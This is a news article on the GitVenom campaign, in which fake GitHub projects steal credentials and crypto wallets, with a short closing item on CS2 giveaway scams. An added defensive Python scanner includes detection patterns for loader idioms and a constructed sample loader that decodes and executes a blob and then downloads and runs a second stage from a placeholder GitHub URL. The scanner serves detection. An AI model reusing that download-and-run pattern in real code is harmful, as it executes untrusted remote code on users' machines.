GitVenom Malware Hijacks Wallets via Fake GitHub Projects, Stealing $456K in Bitcoin

26.02.2025


Cybersecurity experts have uncovered an ongoing campaign targeting gamers and cryptocurrency investors through fake open-source projects on GitHub. Dubbed GitVenom by Kaspersky, the operation involves hundreds of repositories designed to deceive users into downloading malicious software. These fraudulent projects include an Instagram automation tool, a Telegram bot for managing Bitcoin wallets, and a Valorant game crack—all of which are completely fake. Instead of providing their advertised functionality, these projects steal personal and financial data while hijacking cryptocurrency wallets.

The attack has reportedly led to the theft of 5 bitcoins (approximately $456,600), with evidence suggesting that the campaign has been active for at least two years. Most recorded infections have been in Russia, Brazil, and Turkey. The malicious repositories use various programming languages, such as Python, JavaScript, C, C++, and C#. However, their core function remains the same: deploying an embedded malicious payload that downloads additional harmful components from an attacker-controlled GitHub repository.

One of the primary threats in this campaign is a Node.js-based information stealer that gathers sensitive data, including passwords, banking details, stored credentials, cryptocurrency wallet information, and browsing history. This stolen data is compressed into a .7z archive and transmitted to attackers via Telegram. Additionally, the malware installs remote administration tools like AsyncRAT and Quasar RAT, allowing cybercriminals to take control of infected devices. A clipper malware is also deployed to replace copied cryptocurrency wallet addresses with those belonging to the attackers, effectively redirecting digital assets.

Given the widespread use of GitHub among developers worldwide, cybersecurity researchers warn that such malicious campaigns are likely to persist. Kaspersky emphasizes the importance of thoroughly vetting third-party code before executing or integrating it into any project. Developers and users are urged to scrutinize software sources and verify their authenticity to minimize the risk of infection.
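Kaspersky's advice to vet third-party code before running it is easier to follow with a first-pass triage. The script below is an added example, not part of the article and not Kaspersky's or GitHub's tooling: it walks a cloned repository and flags the loader shape the article describes (a long embedded encoded blob that is decoded and executed, and a raw GitHub URL sitting next to a process-launch primitive in the same file). The two sample files and the EXAMPLE-ORG URL are constructed for the demo, and every hit is a lead for manual review rather than a verdict.

```python
"""Heuristic triage of a cloned repository for GitVenom-style loader patterns.

Added example (not Kaspersky's or GitHub's code). Indicators are generic:
a long base64-looking run, a decode-then-execute idiom, and a raw GitHub
URL combined with a download-and-run primitive. Sample inputs are constructed.
"""
import base64
import os
import re
import tempfile
from dataclasses import dataclass

SOURCE_EXTENSIONS = {".py", ".js", ".ts", ".c", ".cpp", ".cs", ".h"}

# A run of 200+ base64-alphabet characters is unusual in hand-written source.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")

# Decode-then-execute idioms across the languages the campaign used.
DECODE_EXEC = re.compile(
    r"exec\s*\(\s*base64\.b64decode|"                  # Python
    r"eval\s*\(\s*(?:atob|Buffer\.from)\s*\(|"          # JavaScript / Node
    r"Assembly\.Load\s*\(\s*Convert\.FromBase64String"  # C#
)

RAW_GITHUB_URL = re.compile(r"https://raw\.githubusercontent\.com/\S+", re.I)

# Primitives that launch a freshly downloaded artifact.
RUN_PRIMITIVES = re.compile(
    r"subprocess\.|os\.system|os\.startfile|child_process|"
    r"Process\.Start|ShellExecute|WinExec"
)


@dataclass
class Finding:
    path: str
    line: int      # 1-based; 0 for file-level indicators
    kind: str
    excerpt: str


def scan_text(text: str, path: str = "<memory>") -> list[Finding]:
    """Return one Finding per indicator hit in a single source file."""
    findings: list[Finding] = []
    has_raw_url = has_run_primitive = False
    for no, line in enumerate(text.splitlines(), 1):
        if BASE64_BLOB.search(line):
            findings.append(Finding(path, no, "long-encoded-blob", line.strip()[:60] + "..."))
        if DECODE_EXEC.search(line):
            findings.append(Finding(path, no, "decode-and-execute", line.strip()[:80]))
        has_raw_url |= bool(RAW_GITHUB_URL.search(line))
        has_run_primitive |= bool(RUN_PRIMITIVES.search(line))
    # The URL and the launch call of a stager usually sit on different lines,
    # so this indicator is evaluated per file rather than per line.
    if has_raw_url and has_run_primitive:
        findings.append(Finding(path, 0, "download-and-run",
                                "raw GitHub URL and process-launch primitive in one file"))
    return findings


def scan_repo(root: str) -> list[Finding]:
    """Scan every source file under root, skipping the .git directory."""
    results: list[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SOURCE_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                results.extend(scan_text(fh.read(), os.path.relpath(full, root)))
    return results


# Constructed sample: a loader of the shape the article describes. The blob is
# base64 of a harmless comment, and EXAMPLE-ORG/EXAMPLE-REPO is a placeholder.
_BLOB = base64.b64encode(b"# placeholder payload " * 12).decode()
SUSPICIOUS_PY = f'''import base64, subprocess, urllib.request
URL = "https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage2.bin"
exec(base64.b64decode("{_BLOB}"))
subprocess.run(["python", urllib.request.urlretrieve(URL)[0]])
'''

# Constructed sample: ordinary code that talks to a network API but runs nothing.
BENIGN_PY = '''import requests

def fetch_prices(symbols):
    resp = requests.get("https://api.example.invalid/prices", params={"s": ",".join(symbols)})
    return resp.json()
'''


def demo() -> dict[str, int]:
    """Write both samples into a temp tree, scan it, return hits per file."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "src"))
        for name, body in (("bot.py", SUSPICIOUS_PY), ("prices.py", BENIGN_PY)):
            with open(os.path.join(root, "src", name), "w", encoding="utf-8") as fh:
                fh.write(body)
        findings = scan_repo(root)
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.path] = counts.get(f.path, 0) + 1
    return counts


if __name__ == "__main__":
    for path, n in demo().items():
        print(f"{path}: {n} indicator(s) -> review before running")
```

Run it against a clone with `scan_repo("/path/to/clone")`; a repository whose advertised purpose (a Telegram bot, an automation tool) does not explain a decode-and-execute call or a second-stage download deserves a manual read before anything is executed.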

Meanwhile, Bitdefender has uncovered another cybersecurity threat targeting gamers. Scammers are exploiting major e-sports tournaments like IEM Katowice 2025 and PGL Cluj-Napoca 2025 to defraud Counter-Strike 2 (CS2) players. By hijacking YouTube accounts and impersonating professional gamers such as s1mple, NiKo, and donk, cybercriminals lure victims into fake CS2 skin giveaways, ultimately leading to stolen Steam accounts, cryptocurrency theft, and the loss of valuable in-game items.
